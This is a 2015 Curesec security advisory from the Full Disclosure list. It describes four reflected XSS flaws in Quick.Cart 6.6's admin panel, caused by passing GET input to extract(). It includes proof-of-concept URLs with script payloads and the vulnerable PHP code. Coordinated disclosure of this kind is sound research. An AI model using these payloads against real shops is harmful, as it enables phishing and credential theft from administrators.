Quick.Cart 6.6: Multiple XSS

["Curesec Research Team (CRT)" <crt () curesec com>]

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Quick.Cart 6.6
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      info () opensolution org
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Description

Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it
is possible to inject JavaScript keylogger or perform phishing attacks.

The vulnerabilities are all in the admin.php file. To add security through
obscurity, Quick.Cart does suggest to rename this file, which would make it
more difficult to exploit these vulnerabilities. The renaming is not mandatory.

The vulnerabilities detailed below depend on the fact that the main entry
points for users and admins contains a call to extract:


index.php
extract( $_GET );

admin.php
extract( $_GET );

With this, it is possible to overwrite or set any variable. Because of this, it
is not considered best-practice to pass user input to extract.

The SESSION variable can not be set by an attacker, because session_start is
called after extract, but variables such as SERVER or COOKIE and undefined
variables can be set.

This call also makes it possible to send POST requests via GET, making the
exploitation of for example CSRF easier. It may have further negative effects
as well.

3. Details

XSS 1

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus=";><script>alert(1)</script>
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts=";><script>alert('xss')</script>

Code:


templates/admin/orders.php
    <form action="?p=<?php echo $p; ?><?php if( isset( $sPhrase ) ) echo '&sPhrase='.$sPhrase; ?><?php if( isset( 
$iStatus ) ) echo '&iStatus='.$iStatus; ?><?php if( isset( $iProducts ) ) echo '&iProducts='.$iProducts; ?>" 
method="post">

XSS 2

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=<script>alert(1)</script>

Code:


templates/admin/languages.php
    <h1><?php echo $lang['Languages'].( isset( $sLanguage ) ? ' '.$sLanguage : null ); ?><a href="<?php echo 
$config['manual_link']; ?>instruction#1.6" title="<?php echo $lang['Manual']; ?>" target="_blank"></a></h1>

XSS 3

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]="; autofocus onfocus="alert('xss')

Code:


common-admin.php
$content = '<script type="text/javascript">
      AddOnload( cursor );
    </script><form method="post" action="'.$sLoginPage.'" name="form"><fieldset><input type="hidden" 
name="sLoginPageNext" value="'.$_SERVER['REQUEST_URI'].'" /><div id="login"><label>'.$lang['Login'].':</label><input 
type="text" name="sLogin" class="input" value="'.( isset( $_COOKIE['sLogin'] ) ? strip_tags( $_COOKIE['sLogin'] ) : 
null ).'" /></pre><div id="pass"><label>'.$lang['Password'].':</label><input type="password" name="sPass" class="input" 
value="" /></pre><div id="submit"><input type="submit" value="'.$lang['log_in'].' >>" /></pre></fieldset></form>';

XSS 4

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]=";></iframe><script>alert(1)</script>&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php

Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the
name of the session key and overwriting one SERVER value leads to the deletion
of all other SERVER values.

Code:


core/libraries/trash.php
    $GLOBALS['lang']['Language'] .= '<iframe src="http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'"; 
style="display:none;"></iframe>';

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this 
issue already
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/